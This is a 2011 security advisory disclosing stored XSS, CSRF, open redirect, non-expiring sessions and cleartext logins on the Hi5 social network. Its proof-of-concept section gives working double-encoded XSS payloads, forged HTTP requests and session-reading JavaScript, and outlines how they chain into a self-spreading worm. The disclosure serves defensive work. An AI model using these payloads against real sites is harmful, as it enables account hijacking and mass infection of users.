Multiple vulnerabilities in Hi5

Multiple vulnerabilities in Hi5

=============================================
INTERNET SECURITY AUDITORS ALERT 2010-11
- Original release date: 29th October 2010
- Last revised:  1st May 2011
- Discovered by: Eduardo Garcia Melia
- Severity: 7.8/10 (CVSSv2 Base Scored)
=============================================

I. VULNERABILITY
-------------------------
Multiple vulnerabilities in Hi5.com social network.

II. BACKGROUND
-------------------------
Hi5 is a social network (www.hi5.com). The company was founded in 2003
by Ramu Yalamanchi. Hi5 has 80 million registered users.

III. DESCRIPTION
-------------------------
This social network has the next vulnerabilities:

1. POST requests can be made through GET method
The application allows realizing the POST requests by means of the GET
method.

2. Persistent Cross-Site Scripting (XSS)
The persistent (or stored) XSS vulnerability is a more devastating
variant of a cross-site scripting flaw: it occurs when the data
provided by the attacker is saved by the server, and then permanently
displayed on "normal" pages returned to other users in the course of
regular browsing, without proper HTML escaping.

3. Cross-Site Request Forgery (CSRF)
CSRF is an attack which forces an end user to execute unwanted actions
on a web application in which he/she is currently authenticated. With
a little help of social engineering (like sending a link via
email/chat or simply visiting the attacker profile ), an attacker may
force the users of a web application to execute actions of the
attacker's choosing.

In some places of the application, no token anti-xsrf is used. In
other places, use as filter anti-xsrf the session value and the
timestamp. The tokens anti-xsrf are not sufficient, because the
persistent XSS vulnerability allows to execute Javascript code.

4. URL Redirection
A URL Redirection Attack is a kind of vulnerability that redirects you
to another page freely out of the original website when accessed,
usually integrated with a phishing attack.

5. The session never expires
While you not logout of the application, the session never expires.

6. Transmission of sensitive information without encryption.
Transmission of sensitive information without ciphered channel (HTTP
protocol), allows that an attacker who has access to this traffic,
capture the sensitive information that could be transmitted, as for
example, the user and password or session.

IV. PROOF OF CONCEPT
-------------------------
1. POST/GET
With this request, auto-accept all comments on his profile
automatically (this makes it possible to perform CSRF attacks more
easy). Example:

+ POST:

        POST /friend/book/updateAutoAcceptSettings.do HTTP/1.1
        Host: hi5.com

        autoAccept=0

+ GET:

        GET /friend/book/updateAutoAcceptSettings.do?autoAccept=0 HTTP/1.1
        Host: hi5.com

2. Persistent Cross-Site Scripting (XSS)
In this case, you can bypass the XSS Filter for inject HTML/JavaScript
code in the application both through comments in the profile as
through internal mail messages, etc. The application accepts html tags
such as <h1>, although many of the dangerous tags are filtered (not
true with <img). To bypass the XSS Filter and inject HTML/JavaScript
code, we just has double encoding:

        <script>alert('XSS')</script>

        And double encoding:
        
&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;
                        
        
%26%23x3c%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x27%3B%26%23x58%3B%26%23x53%3B%26%23x53%3B%26%23x27%3B%26%23x29%3B%26%23x3c%3B%26%23x2f%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B

Using double encoding is it possible to be bypass XSS filters.

Example:

        POST /friend/profile/signBook.do HTTP/1.1
        Host: hi5.com
        
userId=XXXXXX&userid=XXXXXXX&timestamp=-7099815752887097952&js=022EE4CA9DBE77D9D18EF5B8E43F9C71&image=&body=%26%23x3c%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x27%3B%26%23x58%3B%26%23x53%3B%26%23x53%3B%26%23x27%3B%26%23x29%3B%26%23x3c%3B%26%23x2f%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B

This POST request, shows the typical popup with the "XSS" message, but
can be developed for serious attacks like Rainbow worm or other worms
in already used in social networks.

3. Cross-Site Request Forgery (CSRF)
There are requests in the application using anti-XSRF tokens, but
others do not and have been identified and exploited.

When the application do not have any token anti-xsrf, to perform this
attack, the attacker would simply edit her profile, and in the
interests tab, in any field put
<img%20src="/friend/book/updateAutoAcceptSettings.do?autoAccept=0"/>.
Example:

POST /friend/profile/editPersonal.do HTTP/1.1
Host: hi5.com

timestamp=-5798286480324775860&userId=XXXXXXX&interests=<img%20src="/friend/book/updateAutoAcceptSettings.do?autoAccept=0"/>&origAllTimeFavoriteArtists=&allTimeFavoriteArtists=&favoriteMovies=&favoriteTVShows=&favoriteBooks=&favoriteQuote=

This attack could also be exploited through parameter "interests" or
any other.

With this example, a person who visited the attacker's profile,
auto-accept all comments on his profile automatically.

On the other hand, when the applications use as token anti-xsrf the
session and the timestamp, that attacker can use the persistent XSS
vulnerability for injecting javascript code, that puts the session
value in "js" parameter, and the timestamp value in "timestamp"
parameter. For example, the normal POST request for add any friend:

        POST /friend/addFriendAjax.do HTTP/1.1
        Host: hi5.com
        Cookie: esn=FybWQ9s5gu1naTVi6IA0TG2vEbM.;
JSESSIONID=CCE9B8BAED8F1A7A0FA50BF4D39A2238; hi5sp=homepage;
tzoffset=2; userIdLogin=hi5tok;
        timestamp=5718257949255914042&js=CCE9B8BAED8F1A7A0FA50BF4D39A2238&requestSource=SEARCH&userid=XXXXXX&userId=

Through GET/POST vulnerability is it possible to transform into GET
request:

        GET
/friend/addFriendAjax.do?timestamp=5718257949255914042&js=CCE9B8BAED8F1A7A0FA50BF4D39A2238&requestSource=SEARCH&userid=XXXXXX&userId=
HTTP/1.1
        Host: hi5.com
        Cookie: esn=FybWQ9s5gu1naTVi6IA0TG2vEbM.;
JSESSIONID=CCE9B8BAED8F1A7A0FA50BF4D39A2238;

Finally, with persistent XSS vulnerability, the attacker can inject
javascript code for automation this request (OR ANY OTHER) with
something like this:

        <script>
        if (true) {
        window.location.href = "/friend/addFriendAjax.do?timestamp=" +
url.replace("TIMESTAMP", new Date().getTime()) + "&js=" +
HI5.Data.sessionId() + '&requestSource=SEARCH&userid=XXXXXX&userId=';
        }
        </script>

4. URL Redirection
The application allows redirect the browser to any Internet address.
The goal of this attack could be make the victim feel that is
correctly accesing to a resource valid resource, when in fact, is
being redirected to fake man in the middle site for credential
capture. Following, and example redirecting Google.com website:

http://hi5.com/friend/tyTrack.do?cid=42624&id=1&e=&d=http://www.google.com

5. The session never expires
The session on hi5 social network never expires. While you do not
logout, the session remain active:

        + Set-Cookie: hi5loggedIn=true; Expires=Thu, 01-Jan-1970 00:00:10
GMT; Path=/

6. Transmission of sensitive using not using encryption.
For example, the transmission of user and password in the
authentication process.

V. BUSINESS IMPACT
------------------------
These vulnerabilities allowed javascript to be run, opening a lot of
possibilities to users with malicious intentions, for example, took
over Hi5 social networks, infecting millions of users. One of them, is
make all hi5 profiles visible (or any action):

        + Make an Auto-accept user comments on victim's profile through the
CSRF, simply visiting the attacker's profile.

        + After that, the attacker write a message on victim's profile using
JavaScript (persistent XSS) and would make victim's profile visible to
all users.

These two steps are repeated in every victim's profile and grow
exponentially as users visit the victim's profile.

VI. SYSTEMS AFFECTED
-------------------------
Hi5.com social network.

VII. SOLUTION
-------------------------
-

VIII. REFERENCES
-------------------------
http://www.hi5.com
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by
Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
October  29, 2010: First results
January  02, 2011: Initial release
May      01, 2011: Final revision

XI. DISCLOSURE TIMELINE
-------------------------
October  29, 2010: Vulnerability discovered by
                   Internet Security Auditors
January  10, 2011: First attempts for contacting hi5 networks.
January  12, 2011: Received response and advisory sent to vendor.
February 15, 2011: Contact for update -> under correction.
March    04, 2011: Contact for update -> Still correcting.
May      01, 2011: Published after some contacts without answer.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.